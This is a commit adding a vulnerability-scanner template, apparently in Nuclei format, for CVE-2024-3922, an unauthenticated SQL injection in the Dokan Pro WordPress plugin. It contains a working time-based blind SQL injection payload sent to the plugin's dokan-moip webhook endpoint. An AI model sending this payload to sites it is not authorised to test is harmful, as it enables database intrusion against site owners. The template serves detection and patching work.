commit
35dad7d39a
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2024-3922
|
||||
|
||||
info:
|
||||
name: Dokan Pro <= 3.10.3 - SQL Injection
|
||||
author: securityforeveryone
|
||||
severity: critical
|
||||
description: |
|
||||
The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.
|
||||
impact: |
|
||||
Unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
|
||||
remediation: |
|
||||
Fixed in 3.11.0
|
||||
reference:
|
||||
- https://dokan.co/docs/wordpress/changelog/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-3922
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 2
|
||||
publicwww-query: "/wp-content/plugins/dokan-pro/"
|
||||
tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'Dokan product'
|
||||
internal: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
{"env":"1","event":"invoice.created","resource":{"subscription_code":"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='"}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 302'
|
||||
condition: and
|
Loading…
Reference in New Issue